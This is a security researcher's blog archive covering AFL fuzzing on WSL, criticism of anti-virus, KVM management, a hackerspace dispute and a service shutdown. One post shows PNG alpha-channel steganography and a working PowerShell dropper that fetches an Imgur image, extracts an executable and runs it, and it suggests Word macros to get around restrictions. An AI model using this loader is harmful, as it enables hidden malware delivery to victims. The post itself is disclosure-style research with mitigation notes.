Friday, 10 February 2017

Running AFL on Bash for Windows

Recently I wrote about using Virtual Machine Manager in Bash on Windows (or Windows Subsystem for Linux, aka "WSL"), and since then I have been playing around with getting other utilities that I use in a native Linux environment working as well.

One such utility is American Fuzzy Lop (AFL), a fuzzing tool for finding vulnerabilities within Linux ELF binaries. It has since been ported to fuzz Windows PE binaries natively, but since we're able to run ELF binaries within WSL, why not fuzz them too?

If you're running Bash on Windows and have tried to compile AFL before, you probably have run into this problem:

shmget() failed

This error results from WSL having limitations on shared memory--specifically the lack of /dev/shm. By default, AFL will outright refuse to compile because these system functions simply do not exist.

One of the most recent builds of Bash on Windows includes support for the shared-memory functions that AFL requires in order to compile, namely the following shared-memory syscalls, which are widely used by a number of Linux tools including PostgreSQL:

  • shmctl
  • shmget
  • shmdt
  • shmat

The catch here is that the mainline Windows 10 version of WSL has yet to be updated to address this problem so you must be in the Windows Insider program in order to reap the benefits of these functions. Once you've enrolled and have updated, you can confirm the version of WSL by checking the version of Linux using uname.

If you're up to date you should see this version:

Linux mycomputer 4.4.0-43-Microsoft #1-Microsoft Wed Dec 31 14:42:53 PST 2014 x86_64 x86_64 x86_64 GNU/Linux

If you're not up to date then it'll show the following:

Linux mycomputer 3.4.0+ #1 PREEMPT Thu Aug 1 17:06:05 CST 2013 x86_64 x86_64 x86_64 GNU/Linux

Assuming you're successful, you should be able to follow the instructions provided by AFL and begin fuzzing.
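Before building AFL it is worth confirming that those four calls actually work in your WSL build. The script below is an added example, not part of the original post; it calls shmget, shmat, shmdt and shmctl from libc through ctypes, round-trips a marker through a segment and reports the first call that fails (the 64 KiB segment size and the marker string are my own choices).

```python
"""Added example (not from the original post): confirm that the shared-memory
calls AFL relies on (shmget, shmat, shmdt, shmctl) work in this environment.
A 64 KiB segment is used, the size of AFL's default coverage map."""
import ctypes
import os

# Linux values of the System V IPC constants used below.
IPC_PRIVATE = 0
IPC_CREAT = 0o1000
IPC_RMID = 0
SHM_FAILED = ctypes.c_void_p(-1).value   # shmat() returns (void *) -1 on error

libc = ctypes.CDLL(None, use_errno=True)  # symbols of the running process, incl. libc
libc.shmget.argtypes = [ctypes.c_int, ctypes.c_size_t, ctypes.c_int]
libc.shmget.restype = ctypes.c_int
libc.shmat.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_int]
libc.shmat.restype = ctypes.c_void_p
libc.shmdt.argtypes = [ctypes.c_void_p]
libc.shmdt.restype = ctypes.c_int
libc.shmctl.argtypes = [ctypes.c_int, ctypes.c_int, ctypes.c_void_p]
libc.shmctl.restype = ctypes.c_int


def _fail(call):
    err = ctypes.get_errno()
    raise OSError(err, f"{call}() failed: {os.strerror(err)}")


def sysv_shm_roundtrip(size=65536, marker=b"AFL shm check"):
    """Create, attach, write, detach, re-attach, read back and remove a segment.

    Returns True when the marker survives the round trip through the four
    syscalls; raises OSError naming the first call that failed (on an old
    WSL build that is shmget, matching the error AFL prints)."""
    shmid = libc.shmget(IPC_PRIVATE, size, IPC_CREAT | 0o600)
    if shmid < 0:
        _fail("shmget")
    try:
        addr = libc.shmat(shmid, None, 0)
        if addr is None or addr == SHM_FAILED:
            _fail("shmat")
        ctypes.memmove(addr, marker, len(marker))   # write through the first mapping
        if libc.shmdt(addr) != 0:
            _fail("shmdt")
        addr = libc.shmat(shmid, None, 0)           # map it again, possibly elsewhere
        if addr is None or addr == SHM_FAILED:
            _fail("shmat")
        readback = ctypes.string_at(addr, len(marker))
        if libc.shmdt(addr) != 0:
            _fail("shmdt")
    finally:
        # mark the segment for removal, as AFL does in its atexit handler
        removed = libc.shmctl(shmid, IPC_RMID, None) == 0
    if not removed:
        _fail("shmctl")
    return readback == marker


if __name__ == "__main__":
    print("shared memory works" if sysv_shm_roundtrip()
          else "data did not survive the round trip")
```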


I'm still testing it out, but at least we now know that it should compile and run fine on the surface. You will notice that the way the screen is drawn looks a bit wonky while it is running.

One thing I feel the need to add is if you're using an SSD, AFL is definitely a great way to reduce the lifespan of your drive. Instead, I recommend creating a RAM disk within Windows and then accessing it normally. I have tested ImDrive and it works just fine within WSL.

Friday, 27 January 2017

Anti-virus is worthless

I get a kick out of reading reactions by the anti-virus industry, rose-coloured glasses views from academia, or anecdotes from those who work in the IT industry whenever someone writes a constructive criticism of anti-virus solutions.

Let me put it out there before I go any further: Robert O'Callahan is correct when he says that you should disable your anti-virus solution--unless it came with your operating system, as it does in Windows 10. And for disclosure here: I did briefly work for an anti-virus vendor.

Whenever an argument is made about the value that anti-virus doesn't provide, you are bound to get the following reactions from any of the groups I mentioned above:

  • [Insert testing programme here] has given [AV product] the best detection rate in the industry for [year]!
  • I use [AV product] and I have never gotten malware.
  • [Software vendors] should open up their APIs to make anti-virus much easier to work with.
  • The anti-virus industry creates the malware.
  • If you went without anti-virus for [period of time] you'll eventually catch malware!

I could go on and on about these reactions, but I think this image sums up the absentmindedness of certain pro-anti-virus people:



It's obvious which light bulb a sane person would choose.

Tavis Ormandy has demonstrated extremely well through Google's Project Zero initiative (and before that with Sophail) that anti-virus applications have ticking time bombs sitting within their suites. Remote file retrieval, installation of shady remote access tools, improper sandboxing, Node.js debuggers, and permitting possible collisions in SSL certificates are just a sampling of the nearly five dozen vulnerabilities discovered by one single human being.

That is just what is being published in the open. If you are aware of an anti-virus vulnerability, Zerodium will pay for remote code execution attacks. There have been suggestions that they go for at least $20,000 to $50,000 USD.

So let's pretend now that the problems with anti-virus being typically poorly coded just simply don't exist: are they still worth using?



No.

The commonly forgotten trait about anti-virus is that it either has to predict the malware's existence through heuristics or it has to have knowledge of its past artifacts via signatures. Both of these require teams of people to write the protections to handle either approach while at the same time being mindful of the fact that for every detection they make, they could be missing a thousand others. The dirty secret that the AV industry really hates to talk about is how their approach simply cannot scale.

The way that the majority of the anti-virus industry has opted to deflect this is to add more value to their product by redefining themselves as "endpoint solutions". In the past decade, we've seen features like application whitelisting, web content filtering, and physical device control added in order to make the product seem more useful than if it were simply doing AV.

Another angle is to come out with outlandish claims that your product can detect everything using some new, obscure method that nobody else in the industry has come up with.

This is sort of the approach that Cylance has taken, where they claim that their magic algorithm can stop malware even if they haven't seen it before. Unfortunately, there are lots of anecdotes that their product has an extremely high false positive rate, which sort of makes sense if they can predict future malware: detect anything and everything without pause.

However, testing their product and being open about your experience with it is difficult because they require an NDA to get a proof of concept demonstration going in an enterprise environment. In one instance, a friend of mine was demonstrating it, posted about it on an open forum, and apparently Cylance responded negatively, citing the agreement.

This job posting by them reveals a lot however:



I guess all of these contractual restrictions make sense seeing that the engine is likely coded in C#, as suggested in this job posting. The whole anti-virus industry relies on obfuscation of its practices, and that is either done by being closed source, which is really everyone, or by making it so nobody can actually poke around by stipulating such in a contract.

No vendor has a better approach than the other; they're all the same. You either have it never firing on actual malware or have it fire on everything as if it were Chicken Little.

So let's make some useful suggestions here on how to actually protect your computer:
  1. Use the anti-virus your operating system provides. If it doesn't have one, don't install one. Likely if it doesn't have one already, it's either a Mac, you run Linux, or your Compaq from 2005 needs to be replaced with something running Windows 10.
  2. Keep the operating system up to date. If Windows 10 rebooting on you is so inconvenient, you're a lost cause--the most recent update lets you defer up to a month by the way.
  3. Install ad blockers and use something other than Internet Explorer or Edge, such as Chrome, which sandboxes things fairly well.
  4. Don't follow random guides on the Internet to allow you to make changes to your system that somehow make things go "faster". More often than not they're done by people who don't know what they're doing.
  5. Don't use pirated software or pirate any content. Netflix is cheap, Spotify is free if you tolerate ads, and honestly there are tonnes of open source solutions for whatever you need to do.

Don't waste your money or bandwidth on an anti-virus solution that will just create more holes.

Anti-virus is worthless.

Tuesday, 20 December 2016

Windows 10, Virtual Machine Manager, and KVM

I really, really like the fact that Microsoft has embraced Linux in the form of releasing Ubuntu on Windows. To me, it's probably the first Linux-on-the-desktop solution that is as good as using Linux itself without having to worry about using virtualization for my Windows applications and games. However, it's not exactly a true Linux kernel running behind the scenes, and there are things that simply will not work.

For one, out of the box you cannot use any X11 applications without an X server installed and some extra configuration. However, it is relatively painless to get this up and running, and just as easy to get Virtual Machine Manager working as well. If you already have access to the KVM tools on a VM host, you will be able to use it remotely over an SSH connection from the Windows computer.

This is what we're going to need to install:

  • OpenSSH Client
  • Virtual Machine Manager
  • Python Spice GTK module

Assuming that you have already gone ahead and updated and configured Windows 10 to use the feature, you'll want to use Xming to act as your X server. There are other X servers you can consider, including MobaXterm and VcXsrv, but I prefer Xming due to its simplicity and the fact that it sits in the tray once you launch it.

Running XLaunch after installing Xming brings up this screen. Personally, I prefer having it set to multiple windows but of course you'll want to set this to your liking. You can leave the rest as defaults and it should be fine.

With the X server out of the way, we'll want to configure Bash on Windows to automatically connect to it. This can be done by editing the .bashrc file in your home directory and adding the following at the end:

export DISPLAY=:0

Close and reopen Bash on Windows and it is ready to go. You can test whether or not it works by installing something like GEdit or Xterm and seeing if it launches.

We do, however, have to enable D-Bus, as Virtual Machine Manager depends on it. We can do this quickly with the following command, which switches the session bus to a TCP listener on localhost:

sudo sed -i 's$<listen>.*</listen>$<listen>tcp:host=localhost,port=0</listen>$' /etc/dbus-1/session.conf

Once this is done we can now proceed to install VMM.

sudo apt-get install python-spice-client-gtk virt-manager openssh-client

This shouldn't take too long, and once it's done all we have to do is type the following command:

virt-manager

And here we are!


It should be noted that you cannot create virtual machines on your Windows 10 computer using this method--you're better off using Hyper-V if you want to go down this road. However, it is at this point that we can connect to a KVM host using SSH.

You'll want to configure OpenSSH within Bash on Windows with key-based authentication first, but once that is done it's relatively simple to configure the connection. Under the File menu, you'll see Add Connection, which will ask you for some details:


You should see your VMs populate now:



And you can even use them as a console:


Enjoy.

Friday, 2 December 2016

Going viral on Imgur with Powershell and PNG

A few months ago, Kaspersky put out some research into using PNGs to distribute malicious payloads, where malware authors had been embedding PE files into the images themselves. The give-away that something was amiss was that the images had a 63x48 pixel resolution but were 1.3 MB in size.

This isn't very stealthy, and there are ways to do this better.

Encoding a file within a PNG


First, it helps to understand a PNG file. Unlike JPEG, PNG is lossless even though it is compressed, meaning that when you create an image in the format, it retains the data it was generated with until the resolution or colour palette is modified. Unlike a GIF, a PNG file handles transparency through an alpha channel instead of colour substitution.

It's this lossless compression and the alpha channel that will enable us to embed data into a PNG. Each pixel is represented by three 8-bit values for colour and another 8-bit value for the transparency level (referred to as the "alpha channel"). This means that each pixel is presented as R, G, B, and A, with values from 0-255 for each.

Here's a sample image (sourced via Wikipedia) that shows what I am talking about:

This image is 800x600 pixels with 8-bit colour and an alpha channel, meaning that we have 480,000 pixels, or 468 KB of data that we can place within it. Let's use Pillow and Python to mess with this.

The script below is relatively straightforward:

from PIL import Image
from sys import argv
from base64 import b64encode

# usage: python encode.py <input.png> <output.png> <payload file>
i = argv[1]
o = argv[2]
with open(argv[3], 'rb') as f:
    text = f.read()

img_in = Image.open(i).convert('RGBA')     # make sure there is an alpha channel to write into
img_pad = img_in.size[0] * img_in.size[1]  # one byte of encoded payload per pixel
text = b64encode(text)
if len(text) <= img_pad:
    # pad with null bytes so that exactly one character lands on every pixel
    text = text + b'\x00' * (img_pad - len(text))
else:
    raise SystemExit('File is too large to embed into the image.')
# split into one block per column, each block as long as the image is tall
text = [text[n:n + img_in.size[1]] for n in range(0, len(text), img_in.size[1])]

img_o = Image.new(img_in.mode, img_in.size)

for ih, tblock in zip(range(img_in.size[0]), text):
    for iv, an in zip(range(img_in.size[1]), tblock):  # iterating bytes yields ints
        x, y, z, a = img_in.getpixel((ih, iv))
        img_o.putpixel((ih, iv), (x, y, z, an))        # keep RGB, replace the alpha value

img_o.save(o)

Executing it is as follows:

$ python encode.py image.png image_out.png payload.dat

When it runs, it ensures that the payload is not larger than the image can handle, encodes it using Base64, then pads it with null bytes until it reaches the total number of pixels. Each alpha channel value is then replaced with the value of the corresponding character in the encoded data, and the result is saved to disk.

Let's embed an image into an image, shall we!


Inside this image I've encoded a JPEG. The image has obviously changed towards a bit of a softer look with some jankiness in the transparency, but you'd normally never think of it as suspicious. With some changes to the encoding process it is possible to make the alpha channel blend in a lot more naturally.

For the curious, this is the image that was embedded within:


This Python script can retrieve the data out of the image:

from PIL import Image
from sys import argv
from base64 import b64decode

# usage: python decode.py <stego.png> <output file>
i = argv[1]
s = argv[2]
o = bytearray()

img = Image.open(i).convert('RGBA')

# walk the pixels in the same column-major order the encoder used
for x in range(img.size[0]):
    for y in range(img.size[1]):
        p = img.getpixel((x, y))
        o.append(p[-1])   # the alpha value is the last component

o = bytes(o).replace(b'\x00', b'')   # drop the null padding
o = b64decode(o)

with open(s, 'wb') as f:
    f.write(o)

We can confirm that nothing is lost by running these commands:

$ md5 blog_sample.png
MD5 (blog_sample.png) = 694ab6d3260933f75dec92ba01902f9b
$ python encoder.py blog_sample.png blog_sample.out.png antivirus.jpg
$ md5 blog_sample.out.png
MD5 (blog_sample.out.png) = 10a4fd1bf52d0bfa50ced699f8c53c39
$ md5 antivirus.jpg
MD5 (antivirus.jpg) = 84893c561288b6a1a9d76f399a89d51b
$ python decoder.py blog_sample.out.png antivirus.orig.jpg
$ md5 antivirus.orig.jpg
MD5 (antivirus.orig.jpg) = 84893c561288b6a1a9d76f399a89d51b

As you can see, the embedded file comes back unchanged after its round trip through the image's alpha channel.
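Because the encoder replaces every alpha value with a Base64 character or a null pad byte, a payloaded image is easy to spot: its alpha channel contains only those 65 byte values, while a genuine alpha channel is either flat (0 or 255) or spread across the whole 0-255 range. The script below is an added example, not part of the original post: analyse_alpha() scores an alpha sequence and tries to recover the payload, alpha_values() is the only part that needs Pillow, and the thresholds and the MAGIC table are my own assumptions.

```python
"""Added example (not from the original post): triage check for PNGs whose
alpha channel has been replaced with Base64 text, as the encoder above does.
The pixel walk order (column by column) mirrors the encoder."""
import base64
import binascii
from collections import Counter

B64_BYTES = frozenset(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")

# file types worth recognising in a recovered payload (constructed list)
MAGIC = {b"MZ": "PE executable", b"\xff\xd8\xff": "JPEG", b"\x89PNG": "PNG",
         b"PK\x03\x04": "ZIP/Office document", b"%PDF": "PDF"}


def alpha_values(png_path):
    """Alpha byte of every pixel, in the order the encoder wrote them (needs Pillow)."""
    from PIL import Image                      # imported lazily; the analysis below is pure Python
    img = Image.open(png_path).convert("RGBA")
    w, h = img.size
    return [img.getpixel((x, y))[3] for x in range(w) for y in range(h)]


def analyse_alpha(alphas, min_ratio=0.98, min_symbols=8):
    """Score an alpha sequence for a Base64 payload and try to recover it.

    Returns a dict with the share of values that are Base64 or null, the
    number of distinct Base64 symbols seen, a verdict, and, when decoding
    succeeds, the payload bytes plus a guessed file type."""
    counts = Counter(alphas)
    total = len(alphas) or 1
    b64_like = sum(n for v, n in counts.items() if v in B64_BYTES or v == 0)
    symbols = sum(1 for v in counts if v in B64_BYTES)
    result = {"ratio": b64_like / total, "symbols": symbols,
              "suspicious": False, "payload": None, "kind": None}
    # an all-transparent mask scores a high ratio but shows no symbol variety;
    # a fully opaque one (all 255) scores zero, so neither is flagged
    if result["ratio"] < min_ratio or symbols < min_symbols:
        return result
    result["suspicious"] = True
    stripped = bytes(v for v in alphas if v)   # drop the null padding, as the decoder does
    try:
        payload = base64.b64decode(stripped, validate=True)
    except (binascii.Error, ValueError):
        return result                          # Base64-looking but not decodable
    result["payload"] = payload
    result["kind"] = next((k for m, k in MAGIC.items() if payload.startswith(m)), "unknown")
    return result


def make_stego_alphas(payload, n_pixels):
    """Constructed test input: the alpha sequence the encoder above would write."""
    text = base64.b64encode(payload)
    if len(text) > n_pixels:
        raise ValueError("payload too large for the image")
    return list(text + b"\x00" * (n_pixels - len(text)))


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        r = analyse_alpha(alpha_values(path))
        print(path, "suspicious" if r["suspicious"] else "clean",
              f"ratio={r['ratio']:.2f} symbols={r['symbols']} kind={r['kind']}")
```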

Let's use Imgur and Powershell to abuse this


Since its debut on Reddit, Imgur has become one of the largest image hosting services, largely due to the ease of uploading images without having to create an account.

In tests, Imgur does appear to strip out data that doesn't belong to an image. That is, you cannot use the old technique of appending a zip file to a JPEG or PNG on their service, as it appears to outright strip the data.

Since we know that it'll remove these hybrid files, the question then becomes whether it removes the data we encoded as demonstrated earlier. Let's try uploading the sample image from earlier and check.

$ md5 blog_sample.out.png
MD5 (blog_sample.out.png) = 10a4fd1bf52d0bfa50ced699f8c53c39
$ wget https://i.imgur.com/Oj8FhU5.png
--2016-11-24 13:56:50--  https://i.imgur.com/Oj8FhU5.png
Resolving i.imgur.com... 151.101.52.193
Connecting to i.imgur.com|151.101.52.193|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 664208 (649K) [image/png]
Saving to: 'Oj8FhU5.png'

Oj8FhU5.png               100%[====================================>] 648.64K  2.42MB/s   in 0.3s

2016-11-24 13:56:51 (2.42 MB/s) - 'Oj8FhU5.png' saved [664208/664208]

$ md5 Oj8FhU5.png
MD5 (Oj8FhU5.png) = 10a4fd1bf52d0bfa50ced699f8c53c39

As we can see here, the file from earlier that was uploaded to Imgur has not been altered.

So where do we go from here? How is this useful? Well, to start, the great thing about Imgur is that you do not need to sign up for an account to upload an image. Why not use it to distribute malware without having to provide too many details?

One thing to be concerned about is that you have to be able to retrieve the PNG image and then process it, as while there have been code execution issues with PNG libraries in the past, for the most part just loading a payloaded image is unlikely to result in compromise.

Fortunately, Windows has built-in functions that let you work with an image and extract the pixel data. This can be achieved using Powershell without any additional modules. The code is as follows:

Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName System.Text.Encoding

$strURL = "http://i.imgur.com/nckqSN1.png"
$strFilename = "c:\temp\payloadb64.png"
$peOutputFile = "c:\temp\calc.exe"

# Download the PNG and save it to disk
Invoke-WebRequest -Uri $strURL -OutFile $strFilename

# Read every pixel, column by column, and keep the alpha (A) value as a character
$image = [System.Drawing.Image]::FromFile($strFilename)
$peBase64 = @()
for ($w=0;$w -lt $image.Width;$w++)
{
    $row = @()
    for ($h=0;$h -lt $image.Height;$h++)
    {
        $pixel = ($image.GetPixel($w,$h)).A
        $pixel = [convert]::toint32($pixel, 10)
        $pixel = [char]$pixel
        $row += $pixel
    }
    $peBase64 = $peBase64 + $row
}

# Drop the null padding
$peImage = @()
foreach ($peValue in $peBase64)
{
    if ($peValue -ne "`0")
    {
        $peImage += $peValue
    }
}

# Decode the Base64, write the file to disk and run it
$peImage = [System.Convert]::FromBase64String($peImage)
[System.IO.File]::WriteAllBytes($peOutputFile, $peImage)
& $peOutputFile

The script works as follows:
  1. Download a PNG from Imgur and save it to disk
  2. Using System.Drawing, read every pixel and extract the alpha (A) value
  3. Ensure that all null values (0x00) are stripped from the array
  4. Decode Base64 and write file to disk
  5. Run the newly decoded file as an executable

And, based on the above code, it of course launches Calculator:


Executing the above code does require that your system's policy allows the execution of Powershell scripts. That said, while on most home computers this is not an issue, as it is disabled by default, many enterprise environments require this to be on. A way around any restrictions could be to execute the code with the help of VBScript, perhaps storing all of this within a Word macro.

Mitigation


One thing to keep in mind is that while the attack was done using Powershell, it doesn't mean that you couldn't achieve this with a Word document with an embedded macro. Avoiding the execution of any unwanted code is really the best way to go about preventing this from an end-user perspective.

Imgur's response


Imgur did get back to me, stating that while informative, there isn't an immediate need to fix the issue given the impact it presents.

Last Remark


I want to make it clear here that what I am showing, embedding data through a steganographic process, is far from new, as it was one of the many challenges at this year's CSAW CTF qualifiers. It is a relatively common practice, and there are many guides out there to read and software suites to use.

Also, yesterday, PortSwigger posted a rather interesting article on doing something similar using JPEG files.

Thursday, 1 December 2016

A follow up on Vancouver Hack Space

A few weeks ago, I penned an entry on my thoughts about the direction Vancouver Hack Space (VHS) had gone and what led to my decision to ultimately leave it. My opinion about the matter has not changed, but there were comments left and I would like to reply to them.

I should be clear that I am not going to direct the replies necessarily at the commenters themselves, so please forgive me if you feel like I am finger pointing at any specific individuals.

I think it's interesting that you're pining for a VERSION of VHS, rather than evaluating what VHS has become. It's entirely valid to feel that what you're personally looking for in a hackspace is no longer found at VHS, but personally I think that the "be everything to everyone" attitude is a great model.

The reason why I left the space was primarily that it had a larger toxic element to it than it did before, and there were individuals who felt it was better to have a top-down approach to dealing with matters than a consensus approach where everybody who was a member had a say in things.

The "be everything to everyone" model was something that crept into VHS over time and led to it being too inviting, meaning that while we wanted people who didn't know anything to learn, we didn't want people who didn't want to learn to join. There are people at VHS now who do nothing more than exist as a VHS member, adding no value other than saying that they're a member or occupying space for a hobby that is hard to get into--such as the amateur radio station.

If you prefer a version of VHS yourself that is losing over a dozen members each month based on how I describe it then so be it. I am not sure why you'd want a space that allows members who engage in harassment towards others with little resolve but whatever keeps you happy I guess. Your space is not immune from criticism just as much as my opinion isn't either.

He's since been banned from the space for stealing VHS property (a web domain) and continues to (in my opinion, though he's at least polite about it) harass current and potential members on social media "warning" them about the toxic environment, that he himself has created.

I'm glad to hear that the space has taken steps to ban someone from the space for stealing a domain, but am dismayed that you see his opining on how toxic the environment is as constituting harassment. If he (like myself) believes that something is toxic to be part of, he has every right to tell someone about it. This is not harassment.

If VHS were truly about stopping harassment, it needs to look within. I was corrected on the membership status (or lack thereof) of the individual I mentioned in my original piece, but he is still actively a part of the space and is encouraged to be there by the same individual who was harassing the person that VHS had banished. This to me is enough to say that VHS is a toxic space.

Banning someone from the space is only required when you're dealing with real problems. Someone who has been banned from other groups and is harassing members (such as myself) should be an immediate ban. Someone who has had the cops called on them at the space and has possibly been involved in the destruction of a member's project should face an immediate ban. The fact that the decision to ban someone is being made but other examples are being overlooked tells me that there is a vindictive nature to the board and it's not healthy.

For the record, when I was still actively involved in VHS, this person had already been banned before, and he was only the second one to have been banned at all. The other person was banned because they came to borrow an angle grinder for the purposes of removing a bike lock for the second time in two weeks--there were other incidents that led to this decision, but this was the final straw.

As much as it pains me to say this, looking at how Noisebridge deals with this is sort of a way to learn from this all.

As for queer members, there's at least me, I agree that's not much, but from the people that I've seen coming to the open nights, it's not exactly a case of not making the space seem safe as much as perhaps not advertising the space's existence in the correct places?

I'm happy to hear that there are members of the LGBTQ community that take the time to be part of the space, but my point about how it presents itself as a bunch of white males does not change. The space doesn't need to advertise better.

VHS is a cheap place to use a laser cutter. That's about it these days. There are still some excellent people down there that only know it in its current form, and that's unfortunate.

VHS has a tonne of good equipment and that should draw in people to use it. If you're losing so many members per month but have all of this great gear, what do you suppose the reasons behind it are?

The fact that this isn't being addressed and instead you're looking to do silly things like make a member-in-residence role where they maintain the space during its off-hours and not have to pay membership dues tells me that there are problems being overlooked. We never considered this and while there were times people were being messy with stuff being left behind out of order, it never got to the point where we needed anyone to come in and clean it up regularly.

First, kudos if you were one of the founding members of the Hackspace

This isn't the case. Vancouver Hack Space formed in early 2009; I joined in July that year, not at the point of its formation. You can say that I was one of the original members of the space (like the first dozen or two), but I do not count myself as a "founding member". I guess legally I can say I was a founding member, as I believe I was one of the original signatories as per the Societies Act, but my memory is fuzzy on this one.

I believe that no founding member nor anyone pre-2010 is still a member of VHS in good standing.

Apparently in those days you also had to "Disclose your motives and affiliations" - number 5 on the list of "Principles of Unity"

There was a good reason for this and that was to prevent people from usurping the space and using it for their own political purposes--VHS was intended at its start to be as apolitical as it could be.

Prior to the 2010 Winter Olympics, anyone associated with any group that was against the Olympics or anything associated with it was being harassed by the RCMP and Vancouver Police Department. A number of the original members who founded the space or were part of it in its early days had found themselves either being followed or documented due to their involvement or relationship with these groups. I do know for a fact that I was being targeted even though my affiliation with these groups was purely through friendship and association--I never participated with any of these groups either, and for the record I actually attended a curling match during the games.

We had instances where independent media groups had asked us to use the space so they could work on their video projects--we said no. We had people who wanted to throw some party during the Olympics--we said no. It wasn't easy but we did our damnedest to avoid being affiliated directly with any political movement.

We also suspected that the space had been bugged at one point, although it is tough to say whether or not it was true or if we were just being overly paranoid--it would not have been hard to hide such things in 45W, and the more I learn about surveillance, the harder it is to believe otherwise.

When you joined VHS, we wanted to know why you were interested in being part of it. Was it to learn? Was it to pitch a multi-million dollar shitheap of a startup? Or was it because you wanted to make the space into something of your own?

These original rules of VHS served us well and the fact that today you proudly display a code of conduct and by-laws tells me that the space has gone from being a place that would do cool things to a place that really is a maker space and nothing more. To me, VHS has gone from being a hackerspace to a non-profit tech shop--the front page proudly demonstrates that by stating "[the] community garage for a community without garages".

There is nothing wrong with it becoming this, but it would be less of a problem to me if the element of harassment were dealt with appropriately and it had kept the same diversity it had when VHS was really at its peak in 2012/2013.

My other comment is about the wall in the "Bunker" space - it was there for a reason, that being to keep dust out of the common area and also reduce the noise - not to segregate one activity from another.

I know why the wall was put up and completely understand this. My point was a philosophical one.

I want to say openly that there are people who are still involved with VHS that I still respect, and I do hope that, while I am lambasting what it has become, they don't see me as someone who is engaging in harassment towards it and its members.

Closing off, I have had a few members reach out to me about my opinions and I do want to address two things.

For one thing, I was corrected that the harassing individual is not listed as a member of the space. While I am happy to hear this, I still believe that his presence at the space on some sort of interval is a symptom of the problems the space is facing that ultimately led to me not wanting to be around. The fact that he is associated (either as an acquaintance or an actual friend, I do not know) with the individual that had the VPD called on them is even more alarming.

Secondly, while I appreciate being asked how to fix the space, I actually don't want to. It's not that it can't be fixed, but VHS has sort of succumbed to the Ship of Theseus paradox, where while it's VHS in name, it's not the same VHS we started off with.

I appreciate those coming out to offer their comments and asking questions, but my opinion is that VHS has become something I don't care for any longer.

Monday, 21 November 2016

Shutting down Canario

On December 16th, I intend to shut down Canario (formerly Canary)--and by “Canario”, I mean the service, not the company, which I will explain later.

The reasons for this are simple: I am starting a new project in the new year and unfortunately cannot put effort into it without removing something else--and with that, Canario has to go.

The decision has been quite difficult because it has taught me a lot about what I can do as a single individual, but at the same time it also taught me my limitations. I’ve had a few people work with me on Canario over the course of the past four years, but the vast majority of its heavy lifting, maintenance, development, and research has been me and me alone. Overall it has been a tiring experience, but far from a regret and really rewarding.

The journey towards ending it started around the summertime, when I was playing around with the idea of rebuilding it to be more like other services such as HaveIBeenPwned. I like how Troy Hunt has made it very simple, but one aspect I’ve always found lacking about it was that using it for research purposes was very limited. Having said that, his goal isn’t to provide those capabilities but rather to inform people when their information has been compromised and/or exposed.

As I went about developing this new capability, I had been sitting on an idea completely different from Canario but kept thinking about it as just a novel idea with little additional thought. However, in September, I found myself looking into the idea a bit further, doing some research into other similar things (yes, I am being vague here) that were otherwise lacking in features. I came to the conclusion that this idea would be something worth pursuing. I can make it fund itself with a lot less effort and be able to get people involved with, again, a lot less effort.

Circling back, Canario has four big problems for me:

  1. The type of data I am working with is never uniform and never will be. Someone posting a data dump on Pastebin or any other service is going to almost always have it in some unique format where there may be similarities to past dumps, but never enough for me to just automate to near perfection.
  2. Getting exposed data that isn’t publicly available has so many complications. I have become pretty adept at finding this data, but trying to get people to come to me with that data in the same way others have succeeded has proven to be unsuccessful on my part.
  3. Trying to get others on-board to work with me has been difficult at best. I’ve had cases where people wanted to get involved but wanted to have strings attached or where they wanted to contribute data but I wasn’t permitted to sell access to it.
  4. Other people and organisations are doing a better job than me and will continue to do so.

The latter part is really more of a sore point, as I have tried to reach out to people, but by the time I had started to do this there were others in the space already, and trying to improve what I had already done was going to be difficult.

To add to this, I was funding the project out of my own pocket and contributing my free time, so in some ways I wonder if I was being blinded by my egotism to go about it my own way and not let others interfere. One of the difficulties I had overall was trying to come up with a model that would allow it to be self-financed, but every time I’d come up with a model that could work I found it to be very onerous and likely to be of no benefit in the long term.

Having said all that, Canario taught me database design dos and don’ts (and also taught me to hate MySQL and embrace Postgres), allowed me to speak at conferences, has gotten me cited in the media, and it even gave me an opportunity to speak at Facebook to talk about threat intelligence, a topic that I have a lot of mixed opinions about.

So what next?

First of all, when I do close off the service, it’ll just be a hard shutdown. As it stands right now, I have not added any new data since November 15th and I will be leaving it all in place until sometime on December 16th. All user accounts and associated data will be permanently deleted as I do not wish to hold on to this data any further. I’ll do my best to clear up any backup data I have sitting around but for certain the live data will be gone.

All data that has been collected will no longer be available via the site--so search and data viewing will cease to function. If there are requests for copies of the database (again, without user data), I’ll consider them but likely it will not be free and will be as-is--if you plead your case on the “not free” part I’ll hear it.

Second of all, I am starting a new project and I am trying to get others involved. It’s not a pure information security project but at the same time it’s the core aspect of it. I want to make it easier for schools and small businesses to be able to do specific things. Additionally, Canario will continue as a legal entity, acting as a parent to the project.

Obviously right now I am being a bit hush-hush on this idea of mine, but if you’re interested in working with me on this and understand networking and cryptography, let me know--there’s your hint to what I am working on. Aspects of it are going to be open-source.

Monday, 14 November 2016

Why I left Vancouver Hack Space


I recently became aware of a fellow former member of Vancouver Hack Space (VHS)'s blog post about alternatives to the hackerspace in light of it becoming a rather toxic environment. A few years ago, I had penned a draft piece about why I chose to leave but never bothered to publish it. After having seen someone else's disgust for what it has become, I have decided to speak up.

One way to start is to show what VHS looked like in 2009 when I had originally joined (my old iBook is visible in the shot too):


This was the first un-shared physical space that VHS occupied, a room that was barely larger than my living room being used by twenty or so people who all had the same goal in mind: do cool shit. On my first night there, I was enamoured and immediately signed myself as a member.

For me, it was the start of a lot of things: I met a lot of great people, made friends, furthered my own career, and learnt new things--it contributed to me being a better person overall. When I found myself working downtown after leaving my job in Surrey, I was able to put more time into the space and was able to leave work and go straight there to hang out.

VHS had spun up a lot of cool projects or was at least the catalyst for bigger things. The best one I can think of is Mini Maker Faire Vancouver, which otherwise may have never happened if it weren't for the space. Two startups come to mind that have changed the personal lives of members for the better and again it may have not been this way if it were not for VHS' existence.

I think that around the time VHS started to need a new space and new members were coming in was when I started to lose interest in being an active member. For a while, I would still go on a regular basis, but found as time went on that the space was changing, and it was changing for the worse. When it left its location on Hastings Street for a larger one on East 1st Avenue, it was pretty much the end for me and the place because it had already become something that it shouldn't have been.

The aforementioned blog piece stemmed from a variety of abuses directed at someone who spoke out. This was posted to the members-only discussion forum back in May:

